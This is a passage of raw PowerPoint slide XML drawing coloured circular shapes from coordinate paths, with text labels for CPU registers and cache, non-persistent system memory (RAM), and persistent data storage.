                    <a:pt x="1048992" y="533535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047796" y="487249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042571" y="441758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033462" y="397278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020614" y="354029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004173" y="312228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984283" y="272093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961090" y="233841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934738" y="197690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905373" y="163859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873139" y="132565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838182" y="104025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800646" y="78458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760677" y="56082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718420" y="37114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674019" y="21771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627620" y="10273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580398" y="2977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533535" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF886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9299603" y="3147729"/>
            <a:ext cx="1276985" cy="1289685"/>
            <a:chOff x="9299603" y="3147729"/>
            <a:chExt cx="1276985" cy="1289685"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9299603" y="3147729"/>
              <a:ext cx="1276985" cy="1289685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1276984" h="1289685">
                  <a:moveTo>
                    <a:pt x="629851" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="583551" y="2710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537953" y="8702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493205" y="17879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449453" y="30142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406843" y="45394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365523" y="63537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325640" y="84474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287340" y="108105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250770" y="134335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216078" y="163064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183409" y="194196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152911" y="227632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124731" y="263274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99016" y="301026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75911" y="340789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55565" y="382465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38124" y="425958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23734" y="471168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544" y="517998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4821" y="565523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672" y="612787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="659643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706" y="705943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8693" y="751540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17865" y="796289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30122" y="840041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45368" y="882651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63506" y="923970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84437" y="963854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108064" y="1002153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134289" y="1038723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163016" y="1073416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194146" y="1106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227581" y="1136582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263226" y="1164762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300981" y="1190478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340749" y="1213582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382433" y="1233929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425935" y="1251370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471158" y="1265759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518004" y="1276950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565530" y="1284688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612794" y="1288850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659649" y="1289533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705949" y="1286834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751546" y="1280852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796295" y="1271684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840047" y="1259428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882657" y="1244181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="923976" y="1226042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963860" y="1205108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002160" y="1181477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038729" y="1155247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073422" y="1126516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106090" y="1095380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136588" y="1061938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164768" y="1026289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190484" y="988528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213588" y="948755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1233935" y="907067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251376" y="863561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265765" y="818336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276956" y="771490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644750" y="644744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771496" y="12538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723970" y="4816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676706" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629851" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="57AE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419857" y="3268104"/>
              <a:ext cx="1049020" cy="1049020"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1049020" h="1049020">
                  <a:moveTo>
                    <a:pt x="533531" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487240" y="1196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441743" y="6420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397257" y="15527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354001" y="28373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312193" y="44811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272051" y="64697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233793" y="87886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197638" y="114232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163804" y="143590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132508" y="175815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103970" y="210762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78407" y="248286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56038" y="288241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37080" y="330483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21753" y="374866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10273" y="421245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2977" y="468487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="515368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196" y="561669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6420" y="607175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15527" y="651666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28373" y="694925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44811" y="736735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64697" y="776878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87886" y="815136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114232" y="851291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143590" y="885126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175815" y="916423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210762" y="944964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248286" y="970532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288241" y="992910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330483" y="1011878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374866" y="1027221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421245" y="1038719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468468" y="1045995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515334" y="1048955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561625" y="1047743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607124" y="1042505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651611" y="1033386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694869" y="1020530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736680" y="1004083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776826" y="984190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815088" y="960995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851249" y="934644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885091" y="905283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916395" y="873055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944943" y="838106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="970518" y="800580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992901" y="760624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011874" y="718382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027220" y="673999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038719" y="627620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045995" y="580398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1048955" y="533535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047743" y="487249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042505" y="441758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033386" y="397278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020530" y="354029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004083" y="312228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984190" y="272093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960995" y="233841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934644" y="197690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905283" y="163859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873055" y="132565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838106" y="104025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800580" y="78458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760624" y="56082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718382" y="37114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673999" y="21771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627620" y="10273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580397" y="2977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533531" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0184EE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12835543" y="3147729"/>
            <a:ext cx="1277620" cy="1289685"/>
            <a:chOff x="12835543" y="3147729"/>
            <a:chExt cx="1277620" cy="1289685"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12835543" y="3147729"/>
              <a:ext cx="1277620" cy="1289685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1277619" h="1289685">
                  <a:moveTo>
                    <a:pt x="629971" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="583671" y="2710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538073" y="8702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493323" y="17879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449569" y="30142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406958" y="45394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365635" y="63537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325749" y="84474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287445" y="108105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250871" y="134335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216173" y="163064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183497" y="194196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152992" y="227632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124803" y="263274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99078" y="301026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75963" y="340789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55604" y="382465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38149" y="425958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23745" y="471168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538" y="517998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4816" y="565523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="612787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="659643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2710" y="705943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8702" y="751540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17879" y="796289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30142" y="840041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45394" y="882651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63537" y="923970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84474" y="963854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108105" y="1002153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134335" y="1038723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163064" y="1073416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194196" y="1106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227632" y="1136582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263274" y="1164762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301026" y="1190478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340789" y="1213582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382465" y="1233929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425958" y="1251370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471168" y="1265759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517998" y="1276950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565540" y="1284688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612819" y="1288850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659688" y="1289533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706000" y="1286834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751609" y="1280852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796367" y="1271684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840128" y="1259428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882745" y="1244181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924071" y="1226042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963960" y="1205108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002265" y="1181477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038838" y="1155247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073534" y="1126516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106205" y="1095380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136705" y="1061938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164887" y="1026289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190603" y="988528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213709" y="948755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234055" y="907067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251497" y="863561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265886" y="818336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277077" y="771490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644871" y="644744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771617" y="12538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724091" y="4816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676827" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629971" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E691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2955829" y="3268104"/>
              <a:ext cx="1049020" cy="1049020"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1049019" h="1049020">
                  <a:moveTo>
                    <a:pt x="533587" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487285" y="1196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441780" y="6420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397288" y="15527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354029" y="28373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312219" y="44811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272077" y="64697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233819" y="87886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197664" y="114232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163829" y="143590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132532" y="175815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103990" y="210762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78422" y="248286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56045" y="288241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37076" y="330483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21734" y="374866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10235" y="421245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959" y="468487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="515368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1211" y="561669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6449" y="607175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15569" y="651666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28425" y="694925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44872" y="736735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64765" y="776878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87959" y="815136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114310" y="851291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143672" y="885126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175900" y="916423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210849" y="944964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248374" y="970532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288330" y="992910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330572" y="1011878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374955" y="1027221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421334" y="1038719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468556" y="1045995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515419" y="1048955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561705" y="1047743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607197" y="1042505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651676" y="1033386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694925" y="1020530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736726" y="1004083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776862" y="984190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815114" y="960995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851264" y="934644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885095" y="905283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916390" y="873055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944929" y="838106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="970496" y="800580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992872" y="760624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011841" y="718382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027183" y="673999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038681" y="627620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045977" y="580398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1048955" y="533535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047759" y="487249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042534" y="441758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033427" y="397278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020581" y="354029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004143" y="312228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984257" y="272093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961068" y="233841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934722" y="197690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905364" y="163859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873139" y="132565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838192" y="104025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800668" y="78458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760713" y="56082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718471" y="37114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674088" y="21771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627709" y="10273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580467" y="2977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533587" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EEC78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1720976" y="4629150"/>
            <a:ext cx="2347595" cy="69723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212725" marR="5080" indent="-200025">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pP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CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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registers</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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cache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memory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862576" y="4732782"/>
            <a:ext cx="2968625" cy="694055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514350" marR="5080" indent="-501650">
              <a:lnSpc>
                <a:spcPts val="2630"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="190"/>
              </a:spcBef>
            </a:pP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Non-persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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system </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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memory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(RAM)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728329" y="4711065"/>
            <a:ext cx="2425700" cy="69723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724535" marR="5080" indent="-712470">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pP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Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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45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dirty="0" sz="2200" spc="-12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persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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storage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170409" y="4672965"/>
            <a:ext cx="2621915" cy="69723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259079" marR="5080" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100499"/>
